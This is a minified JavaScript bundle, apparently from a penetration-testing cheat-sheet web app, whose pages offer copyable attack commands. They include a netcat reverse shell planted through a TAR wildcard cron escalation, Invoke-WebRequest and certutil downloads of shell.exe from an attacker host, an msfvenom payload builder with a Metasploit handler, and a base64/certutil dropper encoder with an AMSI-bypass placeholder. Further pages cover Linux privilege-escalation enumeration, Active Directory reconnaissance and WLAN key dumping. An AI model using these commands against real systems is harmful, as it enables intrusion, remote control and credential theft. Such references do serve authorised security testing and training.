",n.default.createElement(d,{keyboard:!0},"IEX")),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(d,{copyable:!0},v))),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(d,{copyable:!0},h))),n.default.createElement(u,{level:4},"PowerShell Invoke-WebRequest"),n.default.createElement(d,null,"From PowerShell 3.0 onwards, the ",n.default.createElement(d,{keyboard:!0},"Invoke-WebRequest")," cmdlet is also available, but it is noticeably slower at downloading files. You can use the aliases ",n.default.createElement(d,{keyboard:!0},"iwr"),", ",n.default.createElement(d,{keyboard:!0},"curl"),", and ",n.default.createElement(d,{keyboard:!0},"wget")," instead of the ",n.default.createElement(d,{keyboard:!0},"Invoke-WebRequest")," full name."),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(d,{copyable:!0},g))),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(d,{copyable:!0},_))))),n.default.createElement(i.Divider,{dashed:!0}),n.default.createElement("div",{style:{padding:15,marginTop:15}},n.default.createElement(i.Space,{direction:"vertical"},n.default.createElement(u,{level:3},"SMB Downloads"),n.default.createElement(d,null,"The SMB protocol that runs on port ",n.default.createElement(d,{strong:!0},"TCP/445")," is most commonly found in enterprise networks where Windows services are running. It allows applications and users to transfer files between and between remote servers."),n.default.createElement(d,null,"We can use SMB to download files from our attacker machine easily. We need to create an SMB server in our machine with ",n.default.createElement(c.default,{href:"https://github.com/fortra/impacket/blob/master/examples/smbserver.py",target:"_blank"},"smbserver.py")," from Impacket and then use ",n.default.createElement(d,{keyboard:!0},"copy"),", ",n.default.createElement(d,{keyboard:!0},"move"),", PowerShell ",n.default.createElement(d,{keyboard:!0},"Copy-Item"),", or any other tool that allows connection to SMB."),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(d,{copyable:!0},"sudo impacket-smbserver share -smb2support /tmp/smb_share"))),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(d,{copyable:!0},y))),n.default.createElement(d,{italic:!0},"New versions of Windows block unauthenticated guest access!"),n.default.createElement(d,{italic:!0},"To transfer files in this scenario, we can set a username and password using our Impacket SMB server and mount the SMB server on our windows target machine:"),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(d,{copyable:!0,editable:!0},"sudo impacket-smbserver share -smb2support /tmp/smbshare -user johnDoe -password Sup3rP@ssw0rd!"))),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(d,{copyable:!0},E))))),n.default.createElement(i.Divider,{dashed:!0}),n.default.createElement("div",{style:{padding:15,marginTop:15}},n.default.createElement(i.Space,{direction:"vertical"},n.default.createElement(u,{level:3},"FTP Downloads"),n.default.createElement(d,null,"Another way to transfer files is using FTP (File Transfer Protocol), which use port TCP/21 and TCP/20. We can use the FTP client or PowerShell Net.WebClient to download files from an FTP server."),n.default.createElement(d,null,"We can configure an FTP Server in our attack host using Python3 pyftpdlib module. It can be installed with the following command:"),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(d,{copyable:!0},"sudo pip3 install pyftpdlib")),n.default.createElement(d,{italic:!0,underline:!0},"By default, pyftpdlib uses port 2121. We can change it with the -p / --port option!")),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(d,{copyable:!0},"sudo python3 -m pyftpdlib --port 21"))),n.default.createElement(u,{level:4},"Transfering Files from an FTP Server Using PowerShell"),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(d,{copyable:!0,editable:!0},b))),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(d,{copyable:!0},w))))),n.default.createElement("div",{style:{padding:15,marginTop:15}},n.default.createElement(i.Space,{direction:"vertical"},n.default.createElement(u,{level:3},"FTP Uploads"),n.default.createElement(d,null,"Uploading files using FTP is very similar to downloading files. We can use PowerShell or the FTP client to complete the operation. Before we start our FTP Server using the Python module pyftpdlib, we need to specify the option --write to allow clients to upload files to our attack host."),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(d,{copyable:!0},"sudo python3 -m pyftpdlib --port 21 --write"))),n.default.createElement(u,{level:4},"PowerShell Upload File"),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(d,{copyable:!0,editable:!0},x))),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(d,{copyable:!0},k))))))}},62597:function(e,t,l){"use strict";var a=this&&this.__createBinding||(Object.create?function(e,t,l,a){void 0===a&&(a=l);var n=Object.getOwnPropertyDescriptor(t,l);n&&!("get"in n?!t.__esModule:n.writable||n.configurable)||(n={enumerable:!0,get:function(){return t[l]}}),Object.defineProperty(e,a,n)}:function(e,t,l,a){void 0===a&&(a=l),e[a]=t[l]}),n=this&&this.__setModuleDefault||(Object.create?function(e,t){Object.defineProperty(e,"default",{enumerable:!0,value:t})}:function(e,t){e.default=t}),r=this&&this.__importStar||function(e){if(e&&e.__esModule)return e;var t={};if(null!=e)for(var l in e)"default"!==l&&Object.prototype.hasOwnProperty.call(e,l)&&a(t,e,l);return n(t,e),t},i=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:!0});const o=r(l(50959)),c=i(l(31529)),u=l(35401),s=l(73706),d=i(l(17911)),{Title:p,Paragraph:m}=u.Typography,f=(0,s.createFromIconfontCN)({scriptUrl:["./iconfont.js"]});t.default=()=>{const[e,t]=(0,o.useState)(""),l=(0,c.default)("echo_file_name"),{TextArea:a}=u.Input,[n,r]=l({name:"",input:""}),i=e=>t=>{r(Object.assign(Object.assign({},n),{[e]:t.target.value}))},v=(e=10)=>{const t="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";let l="";if(e>t.length)return"An error occurred";for(let a=0;a<e;a++){const e=Math.floor(Math.random()*t.length);if(!e)return"An error occurred";l+=t[e]}return l},[h,_]=(0,o.useState)("Base64 - Bash"),g=o.default.createElement(u.Menu,{onClick:e=>{_(e.key.toString())}},o.default.createElement(u.Menu.Item,{key:"Base64 - Bash"},"Base64 - Bash"),o.default.createElement(u.Menu.Divider,null),o.default.createElement(u.Menu.Item,{key:"Base64 - CMD"},"Base64 - CMD"),o.default.createElement(u.Menu.Divider,null),o.default.createElement(u.Menu.Item,{key:"Base64 - Powershell"},"Base64 - Powershell"));return o.default.createElement("div",null,o.default.createElement("div",{style:{margin:15}},o.default.createElement(p,{level:2,style:{fontWeight:"bold"}},"Obfuscated Files or Information"),o.default.createElement(m,null,"Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.")),o.default.createElement(u.Divider,{dashed:!0}),o.default.createElement("div",{key:"a",style:{marginTop:15,marginLeft:15}},o.default.createElement(a,{rows:6,value:n.input,onChange:i("input"),placeholder:'$wvlgi = @"\nusing System;\nusing System.Runtime.InteropServices;\npublic class wvlgi {\n [DllImport("kernel32")]\n public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);\n [DllImport("kernel32")]\n public static extern IntPtr LoadLibrary(string name);\n [DllImport("kernel32")]\n public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr tsarvf, uint flNewProtect, out uint lpflOldProtect);\n}\n"@\n'}),o.default.createElement(u.Dropdown,{overlay:g},o.default.createElement("a",{className:"ant-dropdown-link"},h," ",o.default.createElement(s.DownOutlined,{style:{padding:10}}))),o.default.createElement(u.Space,null,o.default.createElement(u.Button,{type:"primary",style:{marginBottom:10,marginTop:15},onClick:()=>(()=>{try{if(0===n.input.length)return void u.message.error("Please enter some text to encode");if("Base64 - Bash"===h){const e=btoa(n.input);t(`echo -n '${e}' | base64 -d > ${n.name}`)}if("Base64 - CMD"===h){const e=btoa(n.input),l=v();t(`echo|set /p="${e}" >> ${l} \ncertutil -decode ${l} ${n.name}\ndel /Q ${l}`)}if("Base64 - Powershell"===h){const e=btoa(n.input),l=v();t(`${"$"+l} = @()\n${"$"+l} +=\n[System.Convert]::FromBase64String("${e}")\n[Environment]::CurrentDirectory = (Get-Location -PSProvider FileSystem).ProviderPath\n[System.IO.File]::WriteAllBytes("${n.name}", ${"$"+l})\nRemove-Variable ${l}`)}}catch(e){u.message.error("Unable to encode properly please try again")}})()},o.default.createElement(f,{type:"icon-lock"}),"Encode"),o.default.createElement(u.Input,{prefix:o.default.createElement(s.FileTextOutlined,null),onChange:i("name"),placeholder:"Output File Name",bordered:!1,value:n.name,style:{marginTop:6}}))),o.default.createElement("div",{key:"b",style:{marginTop:15,marginLeft:15}},o.default.createElement(a,{rows:6,value:e,disabled:!0,onChange:i("output"),style:{cursor:"auto",marginTop:15,color:"#777"},placeholder:"The results will appear here"}),o.default.createElement(d.default,{component:"a","data-clipboard-text":e},o.default.createElement(u.Button,{type:"primary",style:{marginBottom:10,marginTop:15},onClick:()=>{u.message.success("Your payload has been copied successfully !")}},o.default.createElement(s.CopyOutlined,null)," Copy")),o.default.createElement(u.Button,{type:"link",danger:!0,style:{marginBottom:10,marginTop:15,marginLeft:15},onClick:()=>t("")},o.default.createElement(s.ClearOutlined,null)," Clear")))}},54416:function(e,t,l){"use strict";var a=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:!0});const n=a(l(50959)),r=l(35401),i=l(73706),{Title:o,Paragraph:c,Text:u}=r.Typography,{Panel:s}=r.Collapse;t.default=function(){return n.default.createElement("div",{style:{margin:15}},n.default.createElement(o,{level:2,style:{fontWeight:"bold"}},"Useful Linux command for your Penetration Testing"),n.default.createElement(c,null,"List of useful commands on Linux"),n.default.createElement(r.Divider,{orientation:"center",style:{padding:5}},"Script to check every misconfigurations"),n.default.createElement(r.Collapse,{defaultActiveKey:["0"]},n.default.createElement(s,{header:"View the souce code",key:"1"},n.default.createElement("img",{alt:"misconfigcode",src:"https://i.imgur.com/07ft3W4.png",style:{height:"100%",width:"100%"}}),n.default.createElement("br",null),n.default.createElement(r.Button,{href:"https://gist.githubusercontent.com/LasCC/6f3838dc02f46b14e9dbc9bc0972407e/raw/8c29317645df2e1d39777e95df8cf7760458d4d0/misconfiguration.sh",target:"blank",type:"primary",style:{marginBottom:10,marginTop:15}},n.default.createElement(i.ArrowsAltOutlined,{style:{marginRight:5}}),"Download the script"))),n.default.createElement(r.Divider,{orientation:"center",style:{padding:5}},"SUID Commands"),n.default.createElement("div",null,[{title:"find / -user root -perm /4000 2>/dev/null"},{title:"find / -perm -u=s -type f 2>/dev/null"},{title:"find / -type f -name '*.txt' 2>/dev/null"},{title:"find / -user root -perm -4000 -exec ls -ldb {} ; > /tmp/suid"},{title:"getcap -r / 2>/dev/null"}].map(((e,t)=>n.default.createElement(c,{key:t},n.default.createElement("pre",null,n.default.createElement(u,{copyable:!0},e.title)))))),n.default.createElement(r.Divider,{orientation:"center",style:{padding:5}},"What version of the system ?"),n.default.createElement("div",null,[{title:"cat /etc/issue"},{title:"cat /etc/*-release"},{title:"cat /etc/lsb-release"},{title:"cat /etc/redhat-release"}].map(((e,t)=>n.default.createElement(c,{key:t},n.default.createElement("pre",null,n.default.createElement(u,{copyable:!0},e.title)))))),n.default.createElement(r.Divider,{orientation:"center",style:{padding:5}},"What is its kernel version ?"),n.default.createElement("div",null,[{title:"cat /proc/version"},{title:"uname -a"},{title:"uname -mrs"},{title:"rpm -q kernel"},{title:"dmesg | grep Linux"},{title:"ls /boot | grep vmlinuz"}].map(((e,t)=>n.default.createElement(c,{key:t},n.default.createElement("pre",null,n.default.createElement(u,{copyable:!0},e.title)))))),n.default.createElement(r.Divider,{orientation:"center",style:{padding:5}},"What is the environment variables ?"),n.default.createElement("div",null,[{title:"cat /etc/profile"},{title:"cat /etc/bashrc"},{title:"cat ~/.bash_profile"},{title:"cat ~/.bashrc"},{title:"cat ~/.bash_logout"},{title:"env"},{title:"set"}].map(((e,t)=>n.default.createElement(c,{key:t},n.default.createElement("pre",null,n.default.createElement(u,{copyable:!0},e.title)))))),n.default.createElement(r.Divider,{orientation:"center",style:{padding:5}},"Service settings, there is any wrong allocation?"),n.default.createElement("div",null,[{title:"cat /etc/syslog.conf"},{title:"cat /etc/chttp.conf"},{title:"cat /etc/lighttpd.conf"},{title:"cat /etc/cups/cupsd.conf"},{title:"cat /etc/inetd.conf"},{title:"cat /etc/apache2/apache2.conf"},{title:"cat /etc/my.conf"},{title:"cat /etc/httpd/conf/httpd.conf"},{title:"cat /opt/lampp/etc/httpd.conf"},{title:"ls -aRl /etc/ | awk '$1 ~ /^.*r.*/'"}].map(((e,t)=>n.default.createElement(c,{key:t},n.default.createElement("pre",null,n.default.createElement(u,{copyable:!0},e.title)))))),n.default.createElement(r.Divider,{orientation:"center",style:{padding:5}},"Is there any cron jobs ?"),n.default.createElement("div",null,[{title:"crontab -l"},{title:"ls -alh /var/spool/cron"},{title:"ls -al /etc/ | grep cron"},{title:"ls -al /etc/cron*"},{title:"cat /etc/cron*"},{title:"cat /etc/at.allow"},{title:"cat /etc/at.deny"},{title:"cat /etc/cron.allow"},{title:"cat /etc/cron.deny"},{title:"cat /etc/crontab"},{title:"cat /etc/anacrontab"},{title:"cat /var/spool/cron/crontabs/root"}].map(((e,t)=>n.default.createElement(c,{key:t},n.default.createElement("pre",null,n.default.createElement(u,{copyable:!0},e.title)))))),n.default.createElement(r.Divider,{orientation:"center",style:{padding:5}},"Other users host communication with the system ?"),n.default.createElement("div",null,[{title:"lsof -i"},{title:"lsof -i :80"},{title:"grep 80 /etc/services"},{title:"netstat -antup"},{title:"netstat -antpx"},{title:"netstat -tulpn"},{title:"chkconfig --list"},{title:"chkconfig --list | grep 3:on"},{title:"last"},{title:"lastlog"}].map(((e,t)=>n.default.createElement(c,{key:t},n.default.createElement("pre",null,n.default.createElement(u,{copyable:!0},e.title)))))),n.default.createElement(r.Divider,{orientation:"center",style:{padding:5}},"How to port forward ?"),n.default.createElement("div",null,[{title:"FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]"},{title:"FPipe.exe -l 80 -r 80 -s 80 192.168.1.7"},{title:"ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]"},{title:"ssh -L 8080:127.0.0.1:80 [email protected] # Local Port"},{title:"ssh -R 8080:127.0.0.1:80 [email protected] # Remote Port"},{title:"mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] >backpipe"},{title:"mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe # Port Relay"},{title:"mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe # Proxy (Port 80 to 8080)"},{title:"backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc"},{title:"localhost 80 | tee -a outflow & 1>backpipe # Proxy monitor (Port 80 to 8080)"}].map(((e,t)=>n.default.createElement(c,{key:t},n.default.createElement("pre",null,n.default.createElement(u,{copyable:!0},e.title)))))),n.default.createElement(r.Divider,{orientation:"center",style:{padding:5}},"TAR wildcard cronjob privilege escalation"),n.default.createElement("div",null,[{title:'echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your ip> 1234 >/tmp/f" > shell.sh'},{title:'touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"'},{title:'touch "/var/www/html/--checkpoint=1"'}].map(((e,t)=>n.default.createElement(c,{key:t},n.default.createElement("pre",null,n.default.createElement(u,{copyable:!0},e.title)))))))}},42546:function(e,t,l){"use strict";var a=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:!0});const n=a(l(50959)),r=l(35401),i=a(l(31529)),{Title:o,Paragraph:c}=r.Typography;t.default=()=>{const e=(0,i.default)("msfVenomBuilder"),{Option:t}=r.Select,{Panel:a}=r.Collapse,{Text:u}=r.Typography;let s=l(70746),d=l(10565),p=l(341),m=l(37299);const[f,v]=e({Payload:"windows/meterpreter/bind_tcp",LHOST:"10.10.13.37",LPORT:"4444",Encoder:"generic/none",EncoderIterations:"4",Platform:"windows",Arch:"x64",NOP:"200",BadCharacters:"badchars",Format:"exe",Outfile:"reverse_shell.exe"}),{LHOST:h,LPORT:_,Platform:g,Arch:y,NOP:E,Encoder:b,EncoderIterations:w,BadCharacters:x,Format:k,Outfile:S}=f,C=`msfconsole -qx "use exploit/multi/handler; set PAYLOAD ${f.Payload}; set LHOST ${f.LHOST}; set LPORT ${f.LPORT}; run"`,T=e=>t=>{v(Object.assign(Object.assign({},f),{[e]:t.target.value}))},$=e=>t=>{v(Object.assign(Object.assign({},f),{[e]:t}))};return n.default.createElement("div",null,n.default.createElement("div",{style:{margin:15}},n.default.createElement(o,{level:2,style:{fontWeight:"bold"}},"MSF Venom Builder"),n.default.createElement(c,null,"Msfvenom is a command line instance of Metasploit that is used to generate and output all of the various types of shell code that are available in Metasploit.")),n.default.createElement(r.Divider,{dashed:!0}),n.default.createElement("div",{key:"a",style:{marginTop:15,marginLeft:15}},n.default.createElement(r.Form,null,n.default.createElement(r.Form.Item,{name:"payload",valuePropName:f.Payload,required:!0,label:"Payload"},n.default.createElement(r.Select,{showSearch:!0,options:s,value:f.Payload,allowClear:!0,onChange:$("Payload"),placeholder:"python/meterpreter/reverse_http",filterOption:(e,t)=>-1!==t.value.toString().toUpperCase().indexOf(e.toUpperCase())},s.map(((e,l)=>n.default.createElement(t,{value:l},e.value))))),n.default.createElement(r.Row,{gutter:{xs:8,sm:16,md:24,lg:32}},n.default.createElement(r.Col,{span:12},n.default.createElement(r.Form.Item,{required:!0,name:"ip_address",valuePropName:f.LHOST,label:"LHOST"},n.default.createElement(r.Input,{value:f.LHOST,onChange:T("LHOST"),maxLength:15,allowClear:!0,placeholder:"IP Address or domain (ex: 212.212.111.222)"}))),n.default.createElement(r.Col,{span:12},n.default.createElement(r.Form.Item,{required:!0,name:"port",valuePropName:f.LPORT,label:"LPORT"},n.default.createElement(r.Input,{value:f.LPORT,onChange:T("LPORT"),maxLength:5,allowClear:!0,placeholder:"Port (ex: 1337)"})))),n.default.createElement(r.Row,{gutter:{xs:8,sm:16,md:24,lg:32}},n.default.createElement(r.Col,{span:12},n.default.createElement(r.Form.Item,{name:"encoder",valuePropName:f.Encoder,label:"Encoder"},n.default.createElement(r.Select,{showSearch:!0,options:d,value:f.Encoder,onChange:$("Encoder"),placeholder:"x86/shikata_ga_nai",allowClear:!0,filterOption:(e,t)=>-1!==t.value.toUpperCase().indexOf(e.toUpperCase())},d.map(((e,l)=>n.default.createElement(t,{value:l},e.value)))))),n.default.createElement(r.Col,{span:12},n.default.createElement(r.Form.Item,{name:"iteration",valuePropName:f.EncoderIterations,label:"Iterations"},n.default.createElement(r.Input,{value:f.EncoderIterations,onChange:T("EncoderIterations"),placeholder:"4",allowClear:!0})))),n.default.createElement(r.Form.Item,{name:"badchar",valuePropName:f.BadCharacters,label:"Bad Characters"},n.default.createElement(r.Input,{value:f.BadCharacters,onChange:T("BadCharacters"),placeholder:"\\x00\\x0a\\x0d",allowClear:!0}))),n.default.createElement(r.Row,{gutter:{xs:8,sm:16,md:24,lg:32}},n.default.createElement(r.Col,{span:12},n.default.createElement(r.Form.Item,{valuePropName:f.Platform,name:"platform",label:"Platform"},n.default.createElement(r.Select,{showSearch:!0,options:p,value:f.Platform,onChange:$("Platform"),placeholder:"Windows",allowClear:!0,filterOption:(e,t)=>-1!==t.value.toUpperCase().indexOf(e.toUpperCase())},p.map(((e,l)=>n.default.createElement(t,{value:l},e.value)))))),n.default.createElement(r.Col,{span:12},n.default.createElement(r.Form.Item,{valuePropName:f.Arch,name:"architecture",label:"Architecture"},n.default.createElement(r.Select,{showSearch:!0,value:f.Arch,onChange:$("Arch"),placeholder:"x86",allowClear:!0},n.default.createElement(t,{value:"x64"},"x64"),n.default.createElement(t,{value:"x86"},"x86"))))),n.default.createElement(r.Form.Item,{name:"nop",valuePropName:f.NOP,label:"Nop's"},n.default.createElement(r.Input,{value:f.NOP,allowClear:!0,onChange:T("NOP"),maxLength:5,placeholder:"200"})),n.default.createElement(r.Row,{gutter:{xs:8,sm:16,md:24,lg:32}},n.default.createElement(r.Col,{span:9},n.default.createElement(r.Form.Item,{valuePropName:f.Format,name:"format",label:"Format"},n.default.createElement(r.Select,{showSearch:!0,options:m,value:f.Format,onChange:$("Format"),placeholder:"powershell",allowClear:!0,filterOption:(e,t)=>-1!==t.value.toUpperCase().indexOf(e.toUpperCase())},m.map(((e,l)=>n.default.createElement(t,{value:l},e.value)))))),n.default.createElement(r.Col,{span:15},n.default.createElement(r.Form.Item,{valuePropName:f.Outfile,name:"outfile",label:"Output File"},n.default.createElement(r.Input,{value:f.Outfile,onChange:T("Outfile"),placeholder:"reverse_shell",allowClear:!0})))),n.default.createElement(r.Collapse,{defaultActiveKey:["1"],ghost:!0},n.default.createElement(a,{header:"MSF Venom Command",key:"1"},n.default.createElement(c,null,n.default.createElement("pre",null,n.default.createElement(u,{copyable:!0},(e=>{const t=[h&&`LHOST=${h}`,_&&`LPORT=${_}`,g&&`--platform ${g}`,y&&`-a ${y}`,E&&`-n ${E}`,b&&`-e ${b}`,w&&`-i ${w}`,x&&`-b "${x}"`,k&&`-f ${k}`,S&&`-o ${S}`].filter(Boolean);return e.Payload?`msfvenom -p ${e.Payload} ${t.join(" ")}`:""})(f))))),n.default.createElement(a,{header:"Launch Console & Load Handler",key:"2"},n.default.createElement(c,null,n.default.createElement("pre",null,n.default.createElement(u,{copyable:!0},C)))),n.default.createElement(a,{header:"Load Handler Only",key:"3"},n.default.createElement(c,null,n.default.createElement("pre",null,n.default.createElement(u,{copyable:!0},`use exploit/multi/handler\nset PAYLOAD ${f.Payload}\nset LHOST ${f.LHOST}\nset LPORT ${f.LPORT}\nrun`)))))))}},74082:function(e,t,l){"use strict";var a=this&&this.__importDefault||function(e){return e&&e.__esModule?e:{default:e}};Object.defineProperty(t,"__esModule",{value:!0});const n=a(l(50959)),r=l(35401),i=a(l(13326)),o=l(9195),c=a(l(17911)),u=l(73706),{Title:s,Paragraph:d,Text:p}=r.Typography;t.default=function(){const e=()=>{r.message.success("The script has been copied successfully !")},t='$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()\n$PDC = ($domainObj.PdcRoleOwner).Name\n$SearchString = "LDAP://"\n$SearchString += $PDC + "/"\n$DistinguishedName = "DC=$($domainObj.Name.Replace(\'.\', \',DC=\'))"\n$SearchString += $DistinguishedName\n$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)\n$objDomain = New-Object System.DirectoryServices.DirectoryEntry\n$Searcher.SearchRoot = $objDomain\n$Searcher.filter="samAccountType=805306368"\n\n# To search for specific user, uncomment below\n# $Searcher.filter="name=[user_name]"\n\n$Searcher.FindAll()\nForeach($obj in $Result)\n{\n Foreach($prop in $obj.Properties)\n {\n $prop\n }\n Write-Host "------------------------"\n}',l='$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()\n$PDC = ($domainObj.PdcRoleOwner).Name\n$SearchString = "LDAP://"\n$SearchString += $PDC + "/"\n$DistinguishedName = "DC=$($domainObj.Name.Replace(\'.\', \',DC=\'))"\n$SearchString += $DistinguishedName\n$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)\n$objDomain = New-Object System.DirectoryServices.DirectoryEntry\n$Searcher.SearchRoot = $objDomain\n$Searcher.filter="(objectClass=Group)"\n$Result = $Searcher.FindAll()\nForeach($obj in $Result)\n{\n $obj.Properties.name\n}',a='$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()\n$PDC = ($domainObj.PdcRoleOwner).Name\n$SearchString = "LDAP://"\n$SearchString += $PDC + "/"\n$DistinguishedName = "DC=$($domainObj.Name.Replace(\'.\', \',DC=\'))"\n$SearchString += $DistinguishedName\n$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)\n$objDomain = New-Object System.DirectoryServices.DirectoryEntry\n$Searcher.SearchRoot = $objDomain\n\n# change "Secret_Group" to correct group name\n$Searcher.filter="(name=Secret_Group)"\n$Result = $Searcher.FindAll()\nForeach($obj in $Result)\n{\n $obj.Properties.member\n}',m='$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()\n$PDC = ($domainObj.PdcRoleOwner).Name\n$SearchString = "LDAP://"\n$SearchString += $PDC + "/"\n$DistinguishedName = "DC=$($domainObj.Name.Replace(\'.\', \',DC=\'))"\n$SearchString += $DistinguishedName\n$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)\n$objDomain = New-Object System.DirectoryServices.DirectoryEntry\n$Searcher.SearchRoot = $objDomain\n$Searcher.filter="serviceprincipalname=*http*" # change name as needed\n$Result = $Searcher.FindAll()\nForeach($obj in $Result)\n{\n Foreach($prop in $obj.Properties)\n {\n $prop\n }\n}';return n.default.createElement("div",null,n.default.createElement(s,{level:2,style:{fontWeight:"bold",margin:15}},"Powershell handy commands"),n.default.createElement(d,{style:{margin:15}},"List of useful Powershell commands"),n.default.createElement(r.Divider,{orientation:"center"}),n.default.createElement("div",{key:"a",style:{padding:15}},n.default.createElement(s,{level:3},"System enumeration"),[{title:"systeminfo"},{title:"Get-WmiObject Win32_ComputerSystem"},{title:'echo "$env:COMPUTERNAME.$env:USERDNSDOMAIN"'}].map(((e,t)=>n.default.createElement(d,{key:t},n.default.createElement("pre",null,n.default.createElement(p,{copyable:!0},e.title))))),n.default.createElement(p,{strong:!0},"List Security patches"),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(p,{copyable:!0},'Get-Hotfix -description "Security update"'))),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(p,{copyable:!0},"wmic qfe get HotfixID,ServicePackInEffect,InstallDate,InstalledBy,InstalledOn"))),n.default.createElement(p,{strong:!0},"Environment Variables"),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(p,{copyable:!0},"Get-ChildItem Env: | ft Key,Value"))),n.default.createElement(p,{strong:!0}," (over cmd.exe) "),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(p,{copyable:!0},"set"))),n.default.createElement(r.Divider,{orientation:"center"},"HTTP download (wget like)"),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(p,{copyable:!0},'Invoke-WebRequest "http://10.10.10.10/shell.exe" -OutFile "shell.exe" '))),n.default.createElement(p,{strong:!0},"Cmd compatible"),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(p,{copyable:!0},"certutil -urlcache -f http://10.10.10.10/shell.exe shell.exe"))),n.default.createElement(r.Divider,{orientation:"center"},"WLAN enumeration"),[{title:"netsh wlan show profiles"},{title:'netsh wlan show profile name="PROFILE-NAME" key=clear'}].map(((e,t)=>n.default.createElement(d,{key:t},n.default.createElement("pre",null,n.default.createElement(p,{copyable:!0},e.title)))))),n.default.createElement(r.Divider,{orientation:"center"},"Active Directory enumeration"),n.default.createElement("div",{key:"b",style:{padding:15}},n.default.createElement(d,{mark:!0},"Require Powerview.ps1"),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(p,{copyable:!0},"https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1"))),n.default.createElement(p,{strong:!0},"Domain enumeration"),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(p,{copyable:!0},"Get-NetDomain"))),n.default.createElement(p,{strong:!0},"List Forest Domains "),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(p,{copyable:!0},"Get-NetForestDomain"))),n.default.createElement(p,{strong:!0},"Domain SID "),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(p,{copyable:!0},"Get-DomainSID "))),n.default.createElement(p,{strong:!0},"Domain Policy "),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(p,{copyable:!0},"Get-DomainPolicy"))),n.default.createElement(p,{strong:!0},"Domain Organizational Units "),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(p,{copyable:!0},"Get-NetOU"))),n.default.createElement(p,{strong:!0},"List trusted Domains"),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(p,{copyable:!0},"Get-NetDomainTrust"))),n.default.createElement(r.Divider,{orientation:"center"},"GPO enumeration"),n.default.createElement(p,{strong:!0},"GPO applied to the machine"),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(p,{copyable:!0},"Get-NetGPO -ComputerName computername.domain.com"))),n.default.createElement(r.Divider,{orientation:"center"},"Password enumeration"),n.default.createElement(p,{strong:!0},"Last Password Set date"),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(p,{copyable:!0},"Get-UserProperty -Properties pwdlastset"))),n.default.createElement(p,{strong:!0},"Description of User object "),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(p,{copyable:!0},"Find-UserField -SearchField Description -SearchTerm “pass”"))),n.default.createElement(r.Divider,{orientation:"center"},"Computer enumeration"),n.default.createElement(p,{strong:!0},"List Computers of the Domain"),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(p,{copyable:!0},"Get-NetComputer"))),n.default.createElement(p,{strong:!0},"List Pingable Hosts "),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(p,{copyable:!0},"Get-NetComputer -Ping"))),n.default.createElement(p,{strong:!0},"List Windows 7 Ultimate Computers "),n.default.createElement(d,null,n.default.createElement("pre",null,n.default.createElement(p,{copyable:!0},'Get-NetComputer -OperatingSystem "Windows 7 Ultimate"'))),n.default.createElement(r.Divider,{orientation:"center"},"Admin groups and account enumeration"),n.default.createElement(p,{strong:!0},"List Domain Admin 